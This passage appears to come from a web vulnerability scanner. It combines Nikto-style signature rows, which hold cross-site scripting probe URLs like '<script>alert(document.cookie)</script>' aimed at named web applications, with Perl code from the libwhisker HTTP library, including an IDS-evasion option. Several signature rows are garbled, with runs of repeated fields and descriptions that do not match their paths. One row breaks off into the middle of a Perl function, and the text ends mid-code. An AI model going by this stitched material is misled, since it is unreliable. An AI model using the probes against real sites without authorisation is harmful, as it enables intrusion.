vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" "000700","0","4","/examples/cookie","GET","Cookie servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","","" "000701","0","4","/examples/session","GET","Session servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","","" "000702","7501","4","/themes/mambosimple.php?detection=detected&sitename=","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","\[SQL SERVER\] Error Code","","","","","ColdFusion may reveal SQL information in malformed requests.","","" "000717","0","4","/upload.php?type=\"","GET","","GET",";","GET","","GET","666.jsp","GET","","GET","","GET","","GET","","GET","","GET","","GET",".shtm","GET",".stm","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET",";","GET","","GET","","GET","","GET","","GET","","GET","&file=1&keywords=vulnerable","GET","","GET","","GET","","GET",";","GET","&Where=&Sort=Photo&Dir=","GET","","GET",".aspx?aspxerrorpath=null","GET",".aspx","GET",".asp","GET","&rollid=admin&x=3da59a9da8825&","GET","&email1=","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" "000773","0","4","/webamil/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" "000774","59444","4","/users.php?mode=profile&uid=<script>alert(document.cookie)</script>","GET","","GET","","GET","","GET","</script>","GET","</script>","GET","</script>","GET","","GET","&story=&storyext=&op=Preview","GET","","GET","&page=list_users&user=P","GET","","POST","","POST","","GET","","GET","","GET","","GET","","GET","","GET","","GET","alert\('Vulnerable'\)<\/script>","","","","","ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.","","" "000800","0","4","/script>alert('Vulnerable').cfm","GET","","GET","","GET","","GET","","GET","%3Ca%20s=%22&code=1","GET","","GET","&MMN_position=[X:X]","GET","","GET","","GET","&email1=","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" "000814","59093","4","/phptonuke.php?filnavn=","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","200","","","","","OpenAutoClassifieds 1.0 is vulnerable to a XSS attack","","" "000828","2767","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","&fid=2","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","&month=3&month_l=test","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","<","GET","","GET","&PhraseSearchText=&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET",";","GET","","GET","&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview","GET","","GET","&email1=","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" "000905","651","4","/cgi-local/cgiemail-1.6/cgicso?query=","GET","","GET","&month=03&day=05","GET","","GET","&PATH=acatalog%2f","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","&op=browse","GET",".thtml","GET",".shtml","GET",".jsp","GET",".aspx","GET",".jsp","GET","","GET",";","GET","&addressemail=junk@example.com","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET"," ","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET",">","GET","","GET","","GET","","GET",">&tzone=dmz","GET","","GET","&startline=0","GET","&startline=0(naturally)","GET",",/system/status/session","GET",",/system/status/moniter,/system/status/session","GET","&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","', $c ); if ( $found < 0 ) { $found = index( $$dataref, '>', $c ); $found = $LEN if ( $found < 0 ); $c = $found; } else { $c = $found + 2; } if ( $usetagmap == 0 || defined $tagmap->{'!--'} ) { my $dat = substr( $$dataref, $tempstart + 4, $found - $tempstart - 4 ); &$callbackfunc( '!--', { '=' => $dat }, $dataref, $tempstart, $c - $tempstart + 1, $fref ); } next; } elsif ( !$INTAG ) { next if ( substr( $$dataref, $c + 1, 1 ) =~ tr/ \t\r\n// ); $c++; $INTAG = 1; $tagstart = $c - 1; $CURTAG = ''; while ( $c < $LEN && ( $x = substr( $$dataref, $c, 1 ) ) !~ tr/ \t\r\n>=// ) { $CURTAG .= $x; $c++; } chop $CURTAG if ( $xml && substr( $CURTAG, -1, 1 ) eq '/' ); $c++ if ( defined $x && $x ne '>' ); $LCCURTAG = lc($CURTAG); $INTAG = 0 if ( $LCCURTAG !~ tr/a-z0-9// ); next if ( $c >= $LEN ); $cc = substr( $$dataref, $c, 1 ); } } if ( $cc eq '>' ) { next if ( !$INTAG ); if ( $LCCURTAG eq 'script' && !$xml ) { $tempstart = $c + 1; pos($$dataref) = $c; if ( $$dataref !~ m#()#ig ) { # what to do if closing script not found? # right now, we'll just leave the tag alone; # this won't affect the 'absorption' of the # javascript code (and thus, affect parsing) } else { $c = pos($$dataref) - 1; my $l = length($1); $TAG{'='} = substr( $$dataref, $tempstart, $c - $tempstart - $l + 1 ); } } elsif ( $LCCURTAG eq 'textarea' && !$xml ) { $tempstart = $c + 1; pos($$dataref) = $c; if ( $$dataref !~ m#()#ig ) { # no closing textarea... } else { $c = pos($$dataref) - 1; my $l = length($1); $TAG{'='} = substr( $$dataref, $tempstart, $c - $tempstart - $l + 1 ); } } $INTAG = 0; $TAG{'/'}++ if ( $xml && substr( $$dataref, $c - 1, 1 ) eq '/' ); &$callbackfunc( $CURTAG, \%TAG, $dataref, $tagstart, $c - $tagstart + 1, $fref ) if ( $usetagmap == 0 || defined $tagmap->{$LCCURTAG} ); $CURTAG = $LCCURTAG = ''; %TAG = (); next; } if ($INTAG) { $ELEMENT = ''; $VALUE = undef; # eat whitespace pos($$dataref) = $c; if ( $$dataref !~ m/[^ \t\r\n]/g ) { $c = $LEN; next; # should we really abort? } $start = pos($$dataref) - 1; if ( $$dataref !~ m/[ \t\r\n<>=]/g ) { $c = $LEN; next; # should we really abort? } $c = pos($$dataref) - 1; if ( $c > $start ) { $ELEMENT = substr( $$dataref, $start, $c - $start ); chop $ELEMENT if ( $xml && substr( $ELEMENT, -1, 1 ) eq '/' ); } $cc = substr( $$dataref, $c, 1 ); if ( $cc ne '>' ) { # eat whitespace if ( $cc =~ tr/ \t\r\n// ) { $c++ while ( substr( $$dataref, $c, 1 ) =~ tr/ \t\r\n// ); } if ( substr( $$dataref, $c, 1 ) eq '=' ) { $c++; $start = $c; my $p = substr( $$dataref, $c, 1 ); if ( $p eq '"' || $p eq '\'' ) { $c++; $start++; $c = index( $$dataref, $p, $c ); if ( $c < 0 ) { $c = $LEN; next; } # Bad HTML $VALUE = substr( $$dataref, $start, $c - $start ); $c++; pos($$dataref) = $c; } else { pos($$dataref) = $c; if ( $$dataref !~ /[ \t\r\n>]/g ) { $c = $LEN; } else { $c = pos($$dataref) - 1; $VALUE = substr( $$dataref, $start, $c - $start ); chop $VALUE if ( $xml && substr( $$dataref, $c - 1, 2 ) eq '/>' ); } } if ( substr( $$dataref, $c, 1 ) =~ tr/ \t\r\n// ) { if ( $$dataref !~ /[^ \t\r\n]/g ) { $c = $LEN; next; # should we really abort? } $c = pos($$dataref) - 1; } } } # if $c ne '>' $c--; $TAG{$ELEMENT} = $VALUE if ( $ELEMENT ne '' || ( $xml && $ELEMENT ne '/' ) ); } } # finish off any tags we had going if ($INTAG) { &$callbackfunc( $CURTAG, \%TAG, $dataref, $tagstart, $c - $tagstart + 1, $fref ) if ( $usetagmap == 0 || defined $tagmap->{$LCCURTAG} ); } $DR = undef; # void dataref pointer } ################################################################ =item B Params: $position, $length, $replacement Return: nothing html_find_tags_rewrite() is used to 'rewrite' an HTML stream from within an html_find_tags() callback function. In general, you can think of html_find_tags_rewrite working as: substr(DATA, $position, $length) = $replacement Where DATA is the current HTML string the html parser is using. The reason you need to use this function and not substr() is because a few internal parser pointers and counters need to be adjusted to accomodate the changes. If you want to remove a piece of the string, just set the replacement to an empty string (''). If you wish to insert a string instead of overwrite, just set $length to 0; your string will be inserted at the indicated $position. =cut sub html_find_tags_rewrite { return if ( !defined $DR ); my ( $pos, $len, $replace_str ) = @_; # replace the data substr( $$DR, $pos, $len ) = $replace_str; # adjust pointer and length my $l = ( length($replace_str) - $len ); $c += $l; $LEN += $l; } ################################################################ sub _html_find_tags_adjust { my ( $p, $l ) = @_; $c += $p; $LEN += $l; } } # end container ################################################################ =item B Params: \$html_data Return: @urls The html_link_extractor() function uses the internal crawl tests to extract all the HTML links from the given HTML data stream. Note: html_link_extractor() does not unique the returned array of discovered links, nor does it attempt to remove javascript links or make the links absolute. It just extracts every raw link from the HTML stream and returns it. You'll have to do your own post-processing. =cut sub html_link_extractor { my $data = shift; my $ptr; if ( ref($data) ) { $ptr = $data; } else { $ptr = \$data; } # emulate the crawl object parts we need my %OBJ = ( urls => [], forms => {} ); $OBJ{response} = {}; $OBJ{response}->{whisker} = {}; $OBJ{response}->{whisker}->{uri} = ''; html_find_tags( $ptr, # data \&_crawl_extract_links_test, # callback function 0, # xml mode \%OBJ, # data object \%_crawl_linktags ); # tagmap return @{ $OBJ{urls} }; } ################################################################ ################################################################## # cluster global variables %http_host_cache = (); ################################################################## =item B Params: %parameters Return: \%request_hash This function basically 'objectifies' the creation of whisker request hash objects. You would call it like: $req = http_new_request( host=>'www.example.com', uri=>'/' ) where 'host' and 'uri' can be any number of {whisker} hash control values (see http_init_request for default list). =cut sub http_new_request { my %X = @_; my ( $k, $v, %RET, %RES ); http_init_request( \%RET ); while ( ( $k, $v ) = each(%X) ) { $RET{whisker}->{$k} = $v; } $RES{whisker} = {}; $RES{whisker}->{MAGIC} = 31340; $RES{whisker}->{uri} = ''; return ( \%RET, \%RES ) if wantarray(); return \%RET; } ################################################################## =item B Params: [none] Return: \%response_hash This function basically 'objectifies' the creation of whisker response hash objects. You would call it like: $resp = http_new_response() =cut sub http_new_response { my %RET; $RET{whisker} = {}; $RET{whisker}->{MAGIC} = 31340; $RET{whisker}->{uri} = ''; return \%RET; } ################################################################## =item B Params: \%request_hash_to_initialize Return: Nothing (modifies input hash) Sets default values to the input hash for use. Sets the host to 'localhost', port 80, request URI '/', using HTTP 1.1 with GET method. The timeout is set to 10 seconds, no proxies are defined, and all URI formatting is set to standard HTTP syntax. It also sets the Connection (Keep-Alive) and User-Agent headers. NOTICE!! It's important to use http_init_request before calling http_do_request, or http_do_request might puke. Thus, a special magic value is placed in the hash to let http_do_request know that the hash has been properly initialized. If you really must 'roll your own' and not use http_init_request before you call http_do_request, you will at least need to set the MAGIC value (amongst other things). =cut sub http_init_request { # doesn't return anything my ($hin) = shift; return if ( !( defined $hin && ref($hin) ) ); %$hin = (); # clear control hash # control values $$hin{whisker} = { http_space1 => ' ', http_space2 => ' ', version => '1.1', method => 'GET', protocol => 'HTTP', port => 80, uri => '/', uri_prefix => '', uri_postfix => '', uri_param_sep => '?', host => 'localhost', timeout => 10, include_host_in_uri => 0, ignore_duplicate_headers => 1, normalize_incoming_headers => 1, lowercase_incoming_headers => 0, require_newline_after_headers => 0, invalid_protocol_return_value => 1, ssl => 0, ssl_save_info => 0, http_eol => "\x0d\x0a", force_close => 0, force_open => 0, retry => 1, trailing_slurp => 0, force_bodysnatch => 0, max_size => 0, MAGIC => 31339 }; # default header values $$hin{'Connection'} = 'Keep-Alive'; $$hin{'User-Agent'} = "Mozilla (libwhisker/$LW2::VERSION)"; } ################################################################## =item B Params: \%request, \%response [, \%configs] Return: >=1 if error; 0 if no error (also modifies response hash) *THE* core function of libwhisker. http_do_request actually performs the HTTP request, using the values submitted in %request, and placing result values in %response. This allows you to resubmit %request in subsequent requests (%response is automatically cleared upon execution). You can submit 'runtime' config directives as %configs, which will be spliced into $hin{whisker}->{} before anything else. That means you can do: LW2::http_do_request(\%req,\%resp,{'uri'=>'/cgi-bin/'}); This will set $req{whisker}->{'uri'}='/cgi-bin/' before execution, and provides a simple shortcut (note: it does modify %req). This function will also retry any requests that bomb out during the transaction (but not during the connecting phase). This is controlled by the {whisker}->{retry} value. Also note that the returned error message in hout is the *last* error received. All retry errors are put into {whisker}->{retry_errors}, which is an anonymous array. Also note that all NTLM auth logic is implemented in http_do_request(). NTLM requires multiple requests in order to work correctly, and so this function attempts to wrap that and make it all transparent, so that the final end result is what's passed to the application. This function will return 0 on success, 1 on HTTP protocol error, and 2 on non-recoverable network connection error (you can retry error 1, but error 2 means that the server is totally unreachable and there's no point in retrying). =cut sub http_do_request { my ( $hin, $hout ) = ( shift, shift ); return 2 if ( !( defined $hin && ref($hin) ) ); return 2 if ( !( defined $hout && ref($hout) ) ); # setup hash %$hout = (); $$hout{whisker} = {}; $$hout{whisker}->{'MAGIC'} = 31340; $$hout{whisker}->{uri} = $$hin{whisker}->{uri}; if ( !defined $$hin{whisker} || !defined $$hin{whisker}->{'MAGIC'} || $$hin{whisker}->{'MAGIC'} != 31339 ) { $$hout{whisker}->{error} = 'Input hash not initialized'; return 2; } if ( defined $_[0] ) { # handle extra params my %hashref; if ( ref( $_[0] ) eq 'HASH' ) { %hashref = %{ $_[0] }; } else { %hashref = @_; } $$hin{whisker}->{$_} = $hashref{$_} foreach ( keys %hashref ); } if ( defined $$hin{whisker}->{'anti_ids'} ) { # handle anti_ids my %copy = %$hin; $copy{whisker} = {}; %{ $copy{whisker} } = %{ $$hin{whisker} }; encode_anti_ids( \%copy, $$hin{whisker}->{'anti_ids'} ); $hin = \%copy; } # find/setup stream my $cache_key = stream_key($hin); my $stream; if ( !defined $http_host_cache{$cache_key} ) { $stream = stream_new($hin); $http_host_cache{$cache_key} = $stream; } else { $stream = $http_host_cache{$cache_key}; } if ( !defined $stream ) { $$hout{whisker}->{error} = 'unable to allocate stream'; return 2; } my $retry_count = $$hin{whisker}->{retry}; my $puke_flag = 0; my $ret = 1; do { # retries wrapper my ( $aret, $pass ); if ( !$stream->{valid}->() ) { $stream->{clearall}->(); if ( !$stream->{open}->($hin) ) { $$hout{whisker}->{error} = 'opening stream: ' . $stream->{error}; $$hout{whisker}->{error} .= '(reconnect problem after prior request)' if ($puke_flag); return 2; } # freshly open stream/connection, handle auth if ( defined $$hin{whisker}->{proxy_host} && defined $$hin{whisker}->{auth_proxy_callback} ) { $aret = $$hin{whisker}->{auth_proxy_callback} ->( $stream, $hin, $hout ); return $aret if ( $aret != 0 ); # proxy auth error } if ( defined $$hin{whisker}->{auth_callback} ) { $aret = $$hin{whisker}->{auth_callback}->( $stream, $hin, $hout ); return 0 if ( $aret == 200 ); # auth not needed? return $aret if ( $aret != 0 ); # auth error } } _ssl_save_info( $hout, $stream ) if ( $$hin{whisker}->{ssl} > 0 && $$hin{whisker}->{ssl_save_info} > 0 ); $ret = _http_do_request_ex( $stream, $hin, $hout ); $puke_flag++ if ( $ret == 1 && defined( $$hout{whisker}->{http_data_sent} ) ); return $ret if ( $ret == 0 || $ret == 2 ); # success or fatal socket error $retry_count--; } while ( $retry_count >= 0 ); # if we get here, we still had errors, but no more retries return $ret; } ################################################################## sub _http_do_request_ex { my ( $stream, $hin, $hout, $raw ) = @_; return 2 if ( !defined $stream ); return 2 if ( !( defined $hin && ref($hin) ) ); return 2 if ( !( defined $hout && ref($hout) ) ); my $W = $hin->{whisker}; # setup hash, if needed if ( !defined $$hout{whisker}->{MAGIC} || $$hout{whisker}->{MAGIC} != 31340 ) { %$hout = (); $$hout{whisker} = {}; $$hout{whisker}->{'MAGIC'} = 31340; $$hout{whisker}->{uri} = $$hin{whisker}->{uri}; } ##### construct and send request $stream->{clear}->(); if ( defined $raw && ref($raw) ) { $stream->{queue}->($$raw); } else { $stream->{queue}->( http_req2line($hin) ); if ( $$W{version} ne '0.9' ) { $stream->{queue}->( http_construct_headers($hin) ); $stream->{queue}->( $$W{raw_header_data} ) if ( defined $$W{raw_header_data} ); $stream->{queue}->( $$W{http_eol} ); $stream->{queue}->( $$W{data} ) if ( defined $$W{data} ); } # http 0.9 support } # good time to fingerprint, if requested if ( defined $$W{request_fingerprint} ) { $$hout{whisker}->{request_fingerprint} = 'md5:' . md5( $stream->{bufout} ) if ( $$W{request_fingerprint} eq 'md5' ); $$hout{whisker}->{request_fingerprint} = 'md4:' . md4( $stream->{bufout} ) if ( $$W{request_fingerprint} eq 'md4' ); } # all data is wrangled...actually send it now if ( !$stream->{'write'}->() ) { $$hout{whisker}->{'error'} = 'sending request: ' . $stream->{error}; $stream->{'close'}->(); return 1; } # needed for SSL requests # NOTE: this is disabled because it's just a noop anyways # $stream->{writedone}->(); $$hout{whisker}->{http_data_sent} = 1; $$hout{whisker}->{'lowercase_incoming_headers'} = $$W{'lowercase_incoming_headers'}; ##### read and parse response my @H; if ( $$W{'version'} ne '0.9' ) { do { # catch '100 Continue' responses my $resp = _http_getline($stream); if ( !defined $resp ) { $$hout{whisker}->{error} = 'error reading HTTP response'; $$hout{whisker}->{data} = $stream->{bufin}; $stream->{'close'}->(); return 1; } $$hout{whisker}->{'raw_header_data'} .= $resp if ( defined $$W{'save_raw_headers'} ); if ( $resp !~ /^([^\/]+)\/(\d\.\d)([ \t]+)(\d+)([ \t]*)(.*?)([\r\n]+)/ ) { $$hout{whisker}->{'error'} = 'invalid HTTP response'; $$hout{whisker}->{'data'} = $resp; while ( defined( $_ = _http_getline($stream) ) ) { $$hout{whisker}->{'data'} .= $_; } $stream->{'close'}->(); return $$W{'invalid_protocol_return_value'} || 1; } $$hout{whisker}->{protocol} = $1; $$hout{whisker}->{version} = $2; $$hout{whisker}->{http_space1} = $3; $$hout{whisker}->{code} = $4; $$hout{whisker}->{http_space2} = $5; $$hout{whisker}->{message} = $6; $$hout{whisker}->{http_eol} = $7; $$hout{whisker}->{'100_continue'}++ if ( $4 == 100 ); @H = http_read_headers( $stream, $hin, $hout ); if ( !$H[0] ) { $$hout{whisker}->{'error'} = 'Error in reading headers: ' . $H[1]; $stream->{'close'}->(); return 1; } if ( !defined $H[3] ) { # connection my ($t) = utils_find_lowercase_key( $hin, 'connection' ); $H[3] = $t || 'close'; } } while ( $$hout{whisker}->{'code'} == 100 ); } else { # http ver 0.9, we need to fake it since headers are not sent $$hout{whisker}->{version} = '0.9'; $$hout{whisker}->{code} = 200; $$hout{whisker}->{message} = ''; $H[3] = 'close'; } if ( $$hout{whisker}->{code}==404 && defined $$W{'shortcut_on_404'} ) { $stream->{'close'}->(); } elsif ( defined $$W{data_sock} ) { $$hout{whisker}->{data_sock} = $stream->{sock}; $$hout{whisker}->{data_stream} = $stream; } else { if ( $$W{'force_bodysnatch'} || ( $$W{'method'} ne 'HEAD' && $$hout{whisker}->{'code'} != 206 && $$hout{whisker}->{'code'} != 102 ) ) { return 1 if ( !http_read_body( $stream, $hin, $hout, $H[1], $H[2] ) ); # {hide_chunked_responses} stuff follows if ( lc( $H[1] ) eq 'chunked' && defined $$hin{whisker}->{hide_chunked_responses} && $$hin{whisker}->{hide_chunked_responses} == 1 && !defined $$hin{whisker}->{save_raw_chunks} ) { $$hout{'Content-Length'} = length( $$hout{whisker}->{data} ); utils_delete_lowercase_key( $hout, 'transfer-encoding' ); my $new = []; my $cl = 0; foreach ( @{ $$hout{whisker}->{header_order} } ) { my $l = lc($_); if ( $l eq 'content-length' ) { $cl++; next if ( $cl > 1 ); } push @$new, $_ if ( $l ne 'transfer-encoding' ); } push @$new, 'Content-Length' if ( $cl == 0 ); $$hout{whisker}->{header_order} = $new; } } my ($ch) = LW2::utils_find_lowercase_key( $hin, 'connection' ); my $cl = 0; $cl++ if ( ( lc( $H[3] ) ne 'keep-alive' || ( defined $ch && $ch =~ m/close/i ) ) && $$W{'force_open'} != 1 ); $cl++ if ( $$W{'force_close'} > 0 || $stream->{forceclose} > 0 ); $cl++ if ( $$W{'ssl'} > 0 && $LW_SSL_KEEPALIVE == 0 ); $stream->{'close'}->() if ($cl); } if ( defined $$W{'header_delete_on_success'} && ref( $$W{'header_delete_on_success'} ) ) { foreach ( @{ $$W{'header_delete_on_success'} } ) { delete $hin->{$_} if ( exists $hin->{$_} ); } delete $$W{header_delete_on_success}; } $stream->{reqs}++; $$hout{whisker}->{'stats_reqs'} = $stream->{reqs}; $$hout{whisker}->{'stats_syns'} = $stream->{syns}; $$hout{whisker}->{'socket_state'} = $stream->{state}; delete $$hout{whisker}->{'error'}; # no error return 0; } ################################################################## =item B Params: \%request, $uri_only_switch Return: $request req2line is used internally by http_do_request, as well as provides a convienient way to turn a %request configuration into an actual HTTP request line. If $switch is set to 1, then the returned $request will be the URI only ('/requested/page.html'), versus the entire HTTP request ('GET /requested/page.html HTTP/1.0\n\n'). Also, if the 'full_request_override' whisker config variable is set in %hin, then it will be returned instead of the constructed URI. =cut sub http_req2line { my ( $S, $hin, $UO ) = ( '', @_ ); $UO ||= 0; # notice: full_request_override can play havoc with proxy settings if ( defined $$hin{whisker}->{'full_request_override'} ) { return $$hin{whisker}->{'full_request_override'}; } else { # notice the components of a request--this is for flexibility if ( $UO != 1 ) { $S .= $$hin{whisker}->{'method'} . $$hin{whisker}->{'http_space1'}; if ( $$hin{whisker}->{'include_host_in_uri'} > 0 ) { if ( $$hin{whisker}->{'ssl'} == 1 ) { $S .= 'https://'; } else { $S .= 'http://'; } if ( defined $$hin{whisker}->{'uri_user'} ) { $S .= $$hin{whisker}->{'uri_user'}; if ( defined $$hin{whisker}->{'uri_password'} ) { $S .= ':' . $$hin{whisker}->{'uri_password'}; } $S .= '@'; } $S .= $$hin{whisker}->{'host'} . ':' . $$hin{whisker}->{'port'}; } } $S .= $$hin{whisker}->{'uri_prefix'} . $$hin{whisker}->{'uri'} . $$hin{whisker}->{'uri_postfix'}; if ( defined $$hin{whisker}->{'parameters'} && $$hin{whisker}->{'parameters'} ne '' ) { $S .= $$hin{whisker}->{'uri_param_sep'} . $$hin{whisker}->{'parameters'}; } if ( $UO != 1 ) { if ( $$hin{whisker}->{'version'} ne '0.9' ) { $S .= $$hin{whisker}->{'http_space2'} . $$hin{whisker}->{'protocol'} . '/' . $$hin{whisker}->{'version'}; } $S .= $$hin{whisker}->{'http_eol'}; } } return $S; } ################################################################## =item B Params: \%response Return: $response http_resp2line provides a convienient way to turn a %response hash back into the original HTTP response line. =cut sub http_resp2line { my $hout = shift; my $out = ''; return undef if ( !defined $hout || !ref($hout) ); return undef if ( $hout->{whisker}->{MAGIC} != 31340 ); $out .= $$hout{whisker}->{protocol}; $out .= '/'; $out .= $$hout{whisker}->{version}; $out .= $$hout{whisker}->{http_space1}; $out .= $$hout{whisker}->{code}; $out .= $$hout{whisker}->{http_space2}; $out .= $$hout{whisker}->{message}; $out .= $$hout{whisker}->{http_eol}; return $out; } ################################################################## sub _http_getline { my $stream = shift; my ( $str, $t, $bc ) = ( '', 0, 0 ); $t = index( $stream->{bufin}, "\n", 0 ); while ( $t < 0 ) { return undef if !$stream->{read}->() || length($stream->{bufin}) == $bc; $t = index( $stream->{bufin}, "\n", 0 ); $bc = length( $stream->{bufin} ); } my $r = substr( $stream->{bufin}, 0, $t + 1 ); $stream->{bufin} = substr( $stream->{bufin}, $t + 1 ); # substr($stream->{bufin},0,$t+1)=''; return $r; } ################################################################## sub _http_get { # read from socket w/ timeouts my ( $stream, $amount ) = @_; my ( $str, $t, $b ) = ( '', '', 0 ); while ( $amount > length( $stream->{bufin} ) ) { return undef if !$stream->{read}->() || length( $stream->{bufin} ) == $b; $b = length( $stream->{bufin} ); } my $r = substr( $stream->{bufin}, 0, $amount ); $stream->{bufin} = substr( $stream->{bufin}, $amount ); # substr($stream->{bufin},0,$amount)=''; return $r; } ################################################################## sub _http_getall { my ( $tmp, $b, $stream, $max_size ) = ('', 0, @_); while ( $stream->{read}->() && length( $stream->{bufin} ) != $b) { last if ( $max_size && length( $stream->{bufin} ) >= $max_size ); $b = length( $stream->{bufin} ); } ( $tmp, $stream->{bufin} ) = ( $stream->{bufin}, '' ); $tmp = substr($tmp, 0, $max_size) if($max_size && length($tmp) > $max_size); return $tmp; } ################################################################## =item B Params: $hash_ref Return: Nothing This function takes a %hin hash reference and makes sure the proper headers exist (for example, it will add the Host: header, calculate the Content-Length: header for POST requests, etc). For standard requests (i.e. you want the request to be HTTP RFC-compliant), you should call this function right before you call http_do_request. =cut sub http_fixup_request { my $hin = shift; return if ( !( defined $hin && ref($hin) ) ); $$hin{whisker}->{uri} = '/' if ( $$hin{whisker}->{uri} eq '' ); $$hin{whisker}->{http_space1}= ' '; $$hin{whisker}->{http_space2}= ' '; $$hin{whisker}->{protocol}= 'HTTP'; $$hin{whisker}->{uri_param_sep}= '?'; if ( $$hin{whisker}->{'version'} eq '1.1' ) { my ($host) = utils_find_lowercase_key($hin,'host'); $$hin{'Host'} = $$hin{whisker}->{'host'} if(!defined $host || $host eq ''); $$hin{'Host'} .= ':' . $$hin{whisker}->{'port'} if ( index($$hin{'Host'},':') == -1 && ( $$hin{whisker}->{port} != 80 || ( $$hin{whisker}->{ssl}==1 && $$hin{whisker}->{port} != 443 ) ) ); my ($conn) = utils_find_lowercase_key($hin,'connection'); $$hin{'Connection'} = 'Keep-Alive' if(!defined $conn || $conn eq ''); } elsif( $$hin{whisker}->{'version'} eq '1.0' ){ my ($conn) = utils_find_lowercase_key($hin,'connection'); $$hin{'Connection'} = 'close' if(!defined $conn || $conn eq ''); } utils_delete_lowercase_key( $hin, 'content-length' ); if ( $$hin{whisker}->{method} eq 'POST' || defined $$hin{whisker}->{data} ) { $$hin{whisker}->{data}||=''; $$hin{'Content-Length'} = length( $$hin{whisker}->{'data'} ); my ($v) = utils_find_lowercase_key( $hin, 'content-type' ); if ( !defined $v || $v eq '' ) { $$hin{'Content-Type'} = 'application/x-www-form-urlencoded'; } } #if(defined $$hin{whisker}->{'proxy_host'} && $$hin{whisker}->{ssl}==0){ if ( defined $$hin{whisker}->{'proxy_host'} ) { $$hin{whisker}->{'include_host_in_uri'} = 1; } } ################################################################## =item B Params: Nothing Return: Nothing The http_reset function will walk through the %http_host_cache, closing all open sockets and freeing SSL resources. It also clears out the host cache in case you need to rerun everything fresh. Note: if you just want to close a single connection, and you have a copy of the %request hash you used, you should use the http_close() function instead. =cut sub http_reset { my $stream; foreach $stream ( keys %http_host_cache ) { $stream->{'close'}->() if(ref($stream)); delete $http_host_cache{$stream}; } } ################################################################## =item B Params: Nothing Return: $boolean [, $lib_name, $version] The ssl_is_available() function will inform you whether SSL requests are allowed, which is dependant on whether the appropriate SSL libraries are installed on the machine. In scalar context, the function will return 1 or 0. In array context, the second element will be the SSL library name that is currently being used by LW2, and the third elment will be the SSL library version number. Elements two and three (name and version) will be undefined if called in array context and no SSL libraries are available. =cut sub ssl_is_available { return 0 if ( $LW_SSL_LIB == 0 ); if ( $LW_SSL_LIB == 1 ) { return 1 if ( !wantarray() ); return ( 1, "Net::SSLeay", $Net::SSLeay::VERSION ); } elsif ( $LW_SSL_LIB == 2 ) { return 1 if ( !wantarray() ); return ( 1, "Net::SSL", $Net::SSL::VERSION ); } else { utils_carp('',"ssl_is_available: sanity check failed"); return 0; } } ################################################################## sub _ssl_save_info { my ( $hr, $stream ) = @_; my $cert; if ( $stream->{streamtype} == 4 ) { my $SSL = $stream->{sock}; $hr->{whisker}->{ssl_cipher} = Net::SSLeay::get_cipher($SSL); if ( $cert = Net::SSLeay::get_peer_certificate($SSL) ) { $hr->{whisker}->{ssl_cert_subject} = Net::SSLeay::X509_NAME_oneline( Net::SSLeay::X509_get_subject_name($cert) ); $hr->{whisker}->{ssl_cert_issuer} = Net::SSLeay::X509_NAME_oneline( Net::SSLeay::X509_get_issuer_name($cert) ); } return; } if ( $stream->{streamtype} == 5 ) { $hr->{whisker}->{ssl_cipher} = $stream->{sock}->get_cipher(); if ( $cert = $stream->{sock}->get_peer_certificate() ) { $hr->{whisker}->{ssl_cert_subject} = $cert->subject_name(); $hr->{whisker}->{ssl_cert_issuer} = $cert->issuer_name(); } return; } } ################################################################## =item B Params: $stream, \%in, \%out Return: $result_code, $encoding, $length, $connection Read HTTP headers from the given stream, storing the results in %out. On success, $result_code will be 1 and $encoding, $length, and $connection will hold the values of the Transfer-Encoding, Content-Length, and Connection headers, respectively. If any of those headers are not present, then it will have an 'undef' value. On an error, the $result_code will be 0 and $encoding will contain an error message. This function can be used to parse both request and response headers. Note: if there are multiple Transfer-Encoding, Content-Length, or Connection headers, then only the last header value is the one returned by the function. =cut sub http_read_headers { my ( $stream, $in, $hout ) = @_; my $W = $in->{whisker}; my ( $a, $b, $LC, $CL, $TE, $CO ); # we use direct access into the stream buffers for quickest # parsing of the headers my $last; pos( $stream->{bufin} ) = 0; while (1) { $last = pos( $stream->{bufin} ); if ( $stream->{bufin} !~ m/(.*?)[\r]{0,1}\n/g ) { if ( !$stream->{read}->() ) { last if ( $$W{require_newline_after_headers} == 0 && length( $stream->{bufin} ) - 1 == $last ); return ( 0, 'error reading in all headers' ); } pos( $stream->{bufin} ) = $last; next; } last if ( $1 eq '' ); # should we *not* puke on malformed header? return ( 0, 'malformed header' ) if ( 